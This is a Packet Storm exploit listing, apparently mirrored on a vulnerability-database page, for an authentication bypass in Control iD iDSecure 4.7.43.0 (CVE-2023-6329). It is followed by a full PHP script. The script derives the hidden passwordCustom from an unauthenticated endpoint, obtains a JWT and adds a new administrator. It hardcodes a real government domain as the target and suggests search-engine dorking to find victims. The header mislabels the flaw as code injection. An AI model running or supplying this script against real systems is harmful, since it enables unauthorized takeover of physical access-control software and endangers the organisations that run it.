Control iD iDSecure 4.7.43.0 Add Administrator / Authentication Bypass

🗓️ 04 Mar 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 154 Views

Exploit allows adding an administrator without password using Control iD iDSecure 4.7.43.0 vulnerability.

Reporter	Title	Published	Views	Family All 16
Circl	CVE-2023-6329	17 Dec 202309:37	–	circl
CNNVD	Control iD iDSecure Security Breach	27 Nov 202300:00	–	cnnvd
CVE	CVE-2023-6329	27 Nov 202316:34	–	cve
Cvelist	CVE-2023-6329 Control iD iDSecure passwordCustom Authentication Bypass	27 Nov 202316:34	–	cvelist
GithubExploit	Exploit for Improper Authentication in Controlid Idsecure	11 Mar 202615:04	–	githubexploit
Metasploit	Control iD iDSecure Authentication Bypass (CVE-2023-6329)	27 Aug 202418:53	–	metasploit
Nuclei	Control iD iDSecure - Authentication Bypass	6 Jun 202603:01	–	nuclei
NVD	CVE-2023-6329	27 Nov 202317:15	–	nvd
OSV	CVE-2023-6329	27 Nov 202317:15	–	osv
Packet Storm	Control ID IDSecure Authentication Bypass	31 Aug 202400:00	–	packetstorm

=============================================================================================================================================
    | # Title     : Control iD iDSecure v4.7.43.0 PHP Code Injection Vulnerability                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://profil.nunukankab.go.id/org/dkisp                                                                                   |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description:  The code exploits a vulnerability in the ControlID system to add a new administrative user without requiring an existing password.
    	
    	( https://packetstorm.news/files/id/180858/  CVE-2023-6329)
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 114
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class ControlIDExploit {
        private $target;
        private $new_user;
        private $new_password;
    
        public function __construct($target, $new_user, $new_password) {
            $this->target = rtrim($target, '/'); // إزالة أي "/" زائدة في النهاية
            $this->new_user = $new_user;
            $this->new_password = $new_password;
        }
    
        private function send_request($method, $uri, $data = null, $headers = []) {
            $url = "{$this->target}{$uri}";
            $ch = curl_init($url);
    
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($ch, CURLOPT_TIMEOUT, 10); // مهلة الطلب 10 ثوانٍ
    
            if ($data) {
                curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data, JSON_UNESCAPED_UNICODE));
                $headers[] = 'Content-Type: application/json';
            }
    
            if (!empty($headers)) {
                curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            }
    
            $response = curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            $error = curl_error($ch);
            curl_close($ch);
    
            if ($error) {
                die(" Error connecting to $url: $error\n");
            }
    
            if ($http_code == 404) {
                die(" Unexpected response (404 - Not Found): Check the link is valid $url\n");
            }
    
            return json_decode(mb_convert_encoding($response, 'UTF-8', 'auto'), true);
        }
    
        public function exploit() {
            echo " Trying to get the raw data...\n";
            
            // 1) الحصول على serial و passwordRandom
            $response = $this->send_request('GET', '/api/login/unlockGetData');
            
            if (!isset($response['passwordRandom']) || !isset($response['serial'])) {
                die("❌ Failed to get raw data. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
            }
    
            $password_random = $response['passwordRandom'];
            $serial = $response['serial'];
    
            echo " Retrieved passwordRandom: $password_random\n";
            echo " Retrieved serial: $serial\n";
    
            // 2) إنشاء passwordCustom
            $sha1_hash = sha1($serial);
            $combined_string = $sha1_hash . $password_random . 'cid2016';
            $sha256_hash = hash('sha256', $combined_string);
            $short_hash = substr($sha256_hash, 0, 6);
            $password_custom = hexdec($short_hash);
    
            echo " Created passwordCustom: $password_custom\n";
    
            // 3) تسجيل الدخول للحصول على JWT
            echo "Attempt to login...\n";
            $login_data = [
                'passwordCustom' => (string)$password_custom,
                'passwordRandom' => $password_random
            ];
    
            $response = $this->send_request('POST', '/api/login/', $login_data);
            if (!isset($response['accessToken'])) {
                die(" Login failed. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
            }
    
            $access_token = $response['accessToken'];
            echo " Obtained JWT: $access_token\n";
    
            // 4) إضافة مستخدم إداري جديد
            echo " Trying to add a new user...\n";
            $user_data = [
                'idType' => '1',
                'name' => $this->new_user,
                'user' => $this->new_user,
                'newPassword' => $this->new_password,
                'password_confirmation' => $this->new_password
            ];
    
            $headers = [
                "Authorization: Bearer $access_token"
            ];
    
            $response = $this->send_request('POST', '/api/operator/', $user_data, $headers);
            if (!isset($response['code']) || $response['code'] != 200) {
                die(" Failed to add new user. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
            }
    
            echo " User added successfully: {$this->new_user}:{$this->new_password}\n";
        }
    }
    
    // 🔥 أدخل بيانات الاستهداف هنا
    $target_host = 'https://profil.nunukankab.go.id'; // استبدل بعنوان الموقع
    $new_admin_user = 'adminuser';
    $new_admin_password = 'securepassword';
    
    // تشغيل الكود
    $exploit = new ControlIDExploit($target_host, $new_admin_user, $new_admin_password);
    $exploit->exploit();
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

04 Mar 2025 00:00Current

9.7High risk

Vulners AI Score9.7

CVSS 3.19.8

EPSS0.92487